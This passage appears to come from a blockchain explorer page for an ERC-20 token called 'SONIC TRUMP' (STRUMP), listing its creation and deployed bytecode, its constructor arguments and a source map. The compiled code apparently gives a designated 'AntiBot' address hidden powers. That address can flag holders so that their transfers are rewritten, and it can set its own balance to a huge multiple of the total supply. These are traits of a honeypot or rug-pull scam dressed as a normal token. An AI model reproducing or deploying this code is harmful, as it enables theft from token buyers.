fffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610890576000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000600454905090565b61092c6110f7565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561099c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610993906117e2565b60405180910390fd5b6109a581611175565b50565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166109e9610aef565b73ffffffffffffffffffffffffffffffffffffffff1614610a0957610ac7565b610a11610aef565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610ac65761a7f8610a7161091a565b610a7b91906119bb565b60016000610a87610aef565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5e906118a2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610bd7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bce90611802565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cb591906118e2565b60405180910390a3505050565b6000610cce8484610893565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610d485781811015610d3a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3190611822565b60405180910390fd5b610d478484848403610af7565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610dbe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db590611882565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e25906117c2565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060001515600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151514610f1f57610ed261091a565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f1c9190611a15565b90505b81811015610f62576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5990611842565b60405180910390fd5b610f75828261123990919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000610fe26064610fd46008548661124f90919063ffffffff16565b61126590919063ffffffff16565b90506110488161103a85600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461127b90919063ffffffff16565b61123990919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516110e891906118e2565b60405180910390a35050505050565b6110ff610aef565b73ffffffffffffffffffffffffffffffffffffffff1661111d6105cc565b73ffffffffffffffffffffffffffffffffffffffff1614611173576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116a90611862565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081836112479190611a15565b905092915050565b6000818361125d91906119bb565b905092915050565b60008183611273919061198a565b905092915050565b600081836112899190611934565b905092915050565b6000813590506112a081611ba1565b92915050565b6000813590506112b581611bb8565b92915050565b6000602082840312156112cd57600080fd5b60006112db84828501611291565b91505092915050565b600080604083850312156112f757600080fd5b600061130585828601611291565b925050602061131685828601611291565b9150509250929050565b60008060006060848603121561133557600080fd5b600061134386828701611291565b935050602061135486828701611291565b9250506040611365868287016112a6565b9150509250925092565b6000806040838503121561138257600080fd5b600061139085828601611291565b92505060206113a1858286016112a6565b9150509250929050565b6113b481611a49565b82525050565b6113c381611a5b565b82525050565b60006113d482611918565b6113de8185611923565b93506113ee818560208601611a9e565b6113f781611b90565b840191505092915050565b600061140f602383611923565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611475602683611923565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114db602283611923565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611541601d83611923565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b6000611581602683611923565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006115e7602083611923565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b6000611627602583611923565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061168d602483611923565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006116f3602583611923565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61175581611a87565b82525050565b61176481611a91565b82525050565b600060208201905061177f60008301846113ab565b92915050565b600060208201905061179a60008301846113ba565b92915050565b600060208201905081810360008301526117ba81846113c9565b905092915050565b600060208201905081810360008301526117db81611402565b9050919050565b600060208201905081810360008301526117fb81611468565b9050919050565b6000602082019050818103600083015261181b816114ce565b9050919050565b6000602082019050818103600083015261183b81611534565b9050919050565b6000602082019050818103600083015261185b81611574565b9050919050565b6000602082019050818103600083015261187b816115da565b9050919050565b6000602082019050818103600083015261189b8161161a565b9050919050565b600060208201905081810360008301526118bb81611680565b9050919050565b600060208201905081810360008301526118db816116e6565b9050919050565b60006020820190506118f7600083018461174c565b92915050565b6000602082019050611912600083018461175b565b92915050565b600081519050919050565b600082825260208201905092915050565b600061193f82611a87565b915061194a83611a87565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561197f5761197e611b03565b5b828201905092915050565b600061199582611a87565b91506119a083611a87565b9250826119b0576119af611b32565b5b828204905092915050565b60006119c682611a87565b91506119d183611a87565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611a0a57611a09611b03565b5b828202905092915050565b6000611a2082611a87565b9150611a2b83611a87565b925082821015611a3e57611a3d611b03565b5b828203905092915050565b6000611a5482611a67565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611abc578082015181840152602081019050611aa1565b83811115611acb576000848401525b50505050565b60006002820490506001821680611ae957607f821691505b60208210811415611afd57611afc611b61565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b611baa81611a49565b8114611bb557600080fd5b50565b611bc181611a87565b8114611bcc57600080fd5b5056fea2646970667358221220a517e19fd4a19b2c20a75eda9a17d4209aef61ccf9884f816ea1c5cc54de59ff64736f6c63430008000033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e6846ac25908521cdfef229267f2240f10f525e5000000000000000000000000000000000000000000000000000000000000000b534f4e4943205452554d500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006535452554d500000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806395d89b41116100ad578063dd62ed3e11610071578063dd62ed3e14610359578063ebde9fa114610389578063f2fde38b146103a7578063f4cf1452146103c3578063f5dff741146103cd5761012c565b806395d89b41146102a357806396bfcd23146102c1578063a457c2d7146102dd578063a9059cbb1461030d578063ad55651f1461033d5761012c565b8063313ce567116100f4578063313ce567146101fd578063395093511461021b57806370a082311461024b578063715018a61461027b5780638da5cb5b146102855761012c565b806306fdde0314610131578063095ea7b31461014f5780630d6b406b1461017f57806318160ddd146101af57806323b872dd146101cd575b600080fd5b6101396103eb565b60405161014691906117a0565b60405180910390f35b6101696004803603810190610164919061136f565b61047d565b6040516101769190611785565b60405180910390f35b610199600480360381019061019491906112bb565b6104a0565b6040516101a69190611785565b60405180910390f35b6101b76104f6565b6040516101c491906118e2565b60405180910390f35b6101e760048036038101906101e29190611320565b610500565b6040516101f49190611785565b60405180910390f35b61020561052f565b60405161021291906118fd565b60405180910390f35b6102356004803603810190610230919061136f565b610538565b6040516102429190611785565b60405180910390f35b610265600480360381019061026091906112bb565b61056f565b60405161027291906118e2565b60405180910390f35b6102836105b8565b005b61028d6105cc565b60405161029a919061176a565b60405180910390f35b6102ab6105f5565b6040516102b891906117a0565b60405180910390f35b6102db60048036038101906102d691906112bb565b610687565b005b6102f760048036038101906102f2919061136f565b610740565b6040516103049190611785565b60405180910390f35b6103276004803603810190610322919061136f565b6107b7565b6040516103349190611785565b60405180910390f35b610357600480360381019061035291906112bb565b6107da565b005b610373600480360381019061036e91906112e4565b610893565b60405161038091906118e2565b60405180910390f35b61039161091a565b60405161039e91906118e2565b60405180910390f35b6103c160048036038101906103bc91906112bb565b610924565b005b6103cb6109a8565b005b6103d5610ac9565b6040516103e2919061176a565b60405180910390f35b6060600580546103fa90611ad1565b80601f016020809104026020016040519081016040528092919081815260200182805461042690611ad1565b80156104735780601f1061044857610100808354040283529160200191610473565b820191906000526020600020905b81548152906001019060200180831161045657829003601f168201915b5050505050905090565b600080610488610aef565b9050610495818585610af7565b600191505092915050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600454905090565b60008061050b610aef565b9050610518858285610cc2565b610523858585610d4e565b60019150509392505050565b60006012905090565b600080610543610aef565b90506105648185856105558589610893565b61055f9190611934565b610af7565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c06110f7565b6105ca6000611175565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461060490611ad1565b80601f016020809104026020016040519081016040528092919081815260200182805461063090611ad1565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b61068f610aef565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16141561073d576001600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b60008061074b610aef565b905060006107598286610893565b90508381101561079e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610795906118c2565b60405180910390fd5b6107ab8286868403610af7565b60019250505092915050565b6000806107c2610aef565b90506107cf818585610d4e565b600191505092915050565b6107e2610aef565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610890576000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000600454905090565b61092c6110f7565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561099c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610993906117e2565b60405180910390fd5b6109a581611175565b50565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166109e9610aef565b73ffffffffffffffffffffffffffffffffffffffff1614610a0957610ac7565b610a11610aef565b73ffffffffffffffffffffffffffffffffffffffff16600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610ac65761a7f8610a7161091a565b610a7b91906119bb565b60016000610a87610aef565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5e906118a2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610bd7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bce90611802565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cb591906118e2565b60405180910390a3505050565b6000610cce8484610893565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610d485781811015610d3a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3190611822565b60405180910390fd5b610d478484848403610af7565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610dbe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db590611882565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e25906117c2565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060001515600760008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151514610f1f57610ed261091a565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f1c9190611a15565b90505b81811015610f62576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5990611842565b60405180910390fd5b610f75828261123990919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000610fe26064610fd46008548661124f90919063ffffffff16565b61126590919063ffffffff16565b90506110488161103a85600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461127b90919063ffffffff16565b61123990919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516110e891906118e2565b60405180910390a35050505050565b6110ff610aef565b73ffffffffffffffffffffffffffffffffffffffff1661111d6105cc565b73ffffffffffffffffffffffffffffffffffffffff1614611173576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116a90611862565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081836112479190611a15565b905092915050565b6000818361125d91906119bb565b905092915050565b60008183611273919061198a565b905092915050565b600081836112899190611934565b905092915050565b6000813590506112a081611ba1565b92915050565b6000813590506112b581611bb8565b92915050565b6000602082840312156112cd57600080fd5b60006112db84828501611291565b91505092915050565b600080604083850312156112f757600080fd5b600061130585828601611291565b925050602061131685828601611291565b9150509250929050565b60008060006060848603121561133557600080fd5b600061134386828701611291565b935050602061135486828701611291565b9250506040611365868287016112a6565b9150509250925092565b6000806040838503121561138257600080fd5b600061139085828601611291565b92505060206113a1858286016112a6565b9150509250929050565b6113b481611a49565b82525050565b6113c381611a5b565b82525050565b60006113d482611918565b6113de8185611923565b93506113ee818560208601611a9e565b6113f781611b90565b840191505092915050565b600061140f602383611923565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611475602683611923565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006114db602283611923565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611541601d83611923565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b6000611581602683611923565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006115e7602083611923565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b6000611627602583611923565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061168d602483611923565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006116f3602583611923565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61175581611a87565b82525050565b61176481611a91565b82525050565b600060208201905061177f60008301846113ab565b92915050565b600060208201905061179a60008301846113ba565b92915050565b600060208201905081810360008301526117ba81846113c9565b905092915050565b600060208201905081810360008301526117db81611402565b9050919050565b600060208201905081810360008301526117fb81611468565b9050919050565b6000602082019050818103600083015261181b816114ce565b9050919050565b6000602082019050818103600083015261183b81611534565b9050919050565b6000602082019050818103600083015261185b81611574565b9050919050565b6000602082019050818103600083015261187b816115da565b9050919050565b6000602082019050818103600083015261189b8161161a565b9050919050565b600060208201905081810360008301526118bb81611680565b9050919050565b600060208201905081810360008301526118db816116e6565b9050919050565b60006020820190506118f7600083018461174c565b92915050565b6000602082019050611912600083018461175b565b92915050565b600081519050919050565b600082825260208201905092915050565b600061193f82611a87565b915061194a83611a87565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561197f5761197e611b03565b5b828201905092915050565b600061199582611a87565b91506119a083611a87565b9250826119b0576119af611b32565b5b828204905092915050565b60006119c682611a87565b91506119d183611a87565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611a0a57611a09611b03565b5b828202905092915050565b6000611a2082611a87565b9150611a2b83611a87565b925082821015611a3e57611a3d611b03565b5b828203905092915050565b6000611a5482611a67565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611abc578082015181840152602081019050611aa1565b83811115611acb576000848401525b50505050565b60006002820490506001821680611ae957607f821691505b60208210811415611afd57611afc611b61565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b611baa81611a49565b8114611bb557600080fd5b50565b611bc181611a87565b8114611bcc57600080fd5b5056fea2646970667358221220a517e19fd4a19b2c20a75eda9a17d4209aef61ccf9884f816ea1c5cc54de59ff64736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e6846ac25908521cdfef229267f2240f10f525e5000000000000000000000000000000000000000000000000000000000000000b534f4e4943205452554d500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006535452554d500000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): SONIC TRUMP
Arg [1] : symbol_ (string): STRUMP
Arg [2] : AntiBot (address): 0xe6846aC25908521cdFeF229267F2240f10F525e5

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000e6846ac25908521cdfef229267f2240f10f525e5
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [4] : 534f4e4943205452554d50000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [6] : 535452554d500000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

9374:11081:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11114:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13417:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10054:107;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12214:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14190:287;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12064:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14886:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12379:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8553:103;;;:::i;:::-;;7903:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11327:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9908:138;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15627:424;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12706:185;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9757:143;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12954;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10169:103;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8811:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10278:220;;;:::i;:::-;;9574:23;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11114:94;11160:13;11193:7;11186:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11114:94;:::o;13417:193::-;13492:4;13509:13;13525:12;:10;:12::i;:::-;13509:28;;13548:32;13557:5;13564:7;13573:6;13548:8;:32::i;:::-;13598:4;13591:11;;;13417:193;;;;:::o;10054:107::-;10111:4;10136:12;:17;10149:3;10136:17;;;;;;;;;;;;;;;;;;;;;;;;;10129:24;;10054:107;;;:::o;12214:102::-;12267:7;12294:14;;12287:21;;12214:102;:::o;14190:287::-;14313:4;14330:15;14348:12;:10;:12::i;:::-;14330:30;;14371:38;14387:4;14393:7;14402:6;14371:15;:38::i;:::-;14420:27;14430:4;14436:2;14440:6;14420:9;:27::i;:::-;14465:4;14458:11;;;14190:287;;;;;:::o;12064:85::-;12114:5;12139:2;12132:9;;12064:85;:::o;14886:238::-;14974:4;14991:13;15007:12;:10;:12::i;:::-;14991:28;;15030:64;15039:5;15046:7;15083:10;15055:25;15065:5;15072:7;15055:9;:25::i;:::-;:38;;;;:::i;:::-;15030:8;:64::i;:::-;15112:4;15105:11;;;14886:238;;;;:::o;12379:119::-;12445:7;12472:9;:18;12482:7;12472:18;;;;;;;;;;;;;;;;12465:25;;12379:119;;;:::o;8553:103::-;7787:15;:13;:15::i;:::-;8618:30:::1;8645:1;8618:18;:30::i;:::-;8553:103::o:0;7903:87::-;7949:7;7976:6;;;;;;;;;;;7969:13;;7903:87;:::o;11327:98::-;11375:13;11408:9;11401:16;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11327:98;:::o;9908:138::-;9975:12;:10;:12::i;:::-;9964:23;;:7;;;;;;;;;;;:23;;;9960:79;;;10023:4;10003:12;:17;10016:3;10003:17;;;;;;;;;;;;;;;;:24;;;;;;;;;;;;;;;;;;9960:79;9908:138;:::o;15627:424::-;15720:4;15737:13;15753:12;:10;:12::i;:::-;15737:28;;15776:24;15803:25;15813:5;15820:7;15803:9;:25::i;:::-;15776:52;;15867:15;15847:16;:35;;15839:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;15952:60;15961:5;15968:7;15996:15;15977:16;:34;15952:8;:60::i;:::-;16039:4;16032:11;;;;15627:424;;;;:::o;12706:185::-;12777:4;12794:13;12810:12;:10;:12::i;:::-;12794:28;;12833;12843:5;12850:2;12854:6;12833:9;:28::i;:::-;12879:4;12872:11;;;12706:185;;;;:::o;9757:143::-;9828:12;:10;:12::i;:::-;9817:23;;:7;;;;;;;;;;;:23;;;9813:80;;;9876:5;9856:12;:17;9869:3;9856:17;;;;;;;;;;;;;;;;:25;;;;;;;;;;;;;;;;;;9813:80;9757:143;:::o;12954:::-;13035:7;13062:11;:18;13074:5;13062:18;;;;;;;;;;;;;;;:27;13081:7;13062:27;;;;;;;;;;;;;;;;13055:34;;12954:143;;;;:::o;10169:103::-;10223:7;10250:14;;10243:21;;10169:103;:::o;8811:201::-;7787:15;:13;:15::i;:::-;8920:1:::1;8900:22;;:8;:22;;;;8892:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;8976:28;8995:8;8976:18;:28::i;:::-;8811:201:::0;:::o;10278:220::-;10338:7;;;;;;;;;;;10322:23;;:12;:10;:12::i;:::-;:23;;;10318:62;;10362:7;;10318:62;10405:12;:10;:12::i;:::-;10394:23;;:7;;;;;;;;;;;:23;;;10390:101;;;10474:5;10459:14;:12;:14::i;:::-;:20;;;;:::i;:::-;10433:9;:23;10443:12;:10;:12::i;:::-;10433:23;;;;;;;;;;;;;;;:46;;;;10390:101;10278:220;:::o;9574:23::-;;;;;;;;;;;;;:::o;6698:98::-;6751:7;6778:10;6771:17;;6698:98;:::o;19340:380::-;19493:1;19476:19;;:5;:19;;;;19468:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19574:1;19555:21;;:7;:21;;;;19547:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19658:6;19628:11;:18;19640:5;19628:18;;;;;;;;;;;;;;;:27;19647:7;19628:27;;;;;;;;;;;;;;;:36;;;;19696:7;19680:32;;19689:5;19680:32;;;19705:6;19680:32;;;;;;:::i;:::-;;;;;;;;19340:380;;;:::o;20011:441::-;20146:24;20173:25;20183:5;20190:7;20173:9;:25::i;:::-;20146:52;;20233:17;20213:16;:37;20209:236;;20295:6;20275:16;:26;;20267:68;;;;;;;;;;;;:::i;:::-;;;;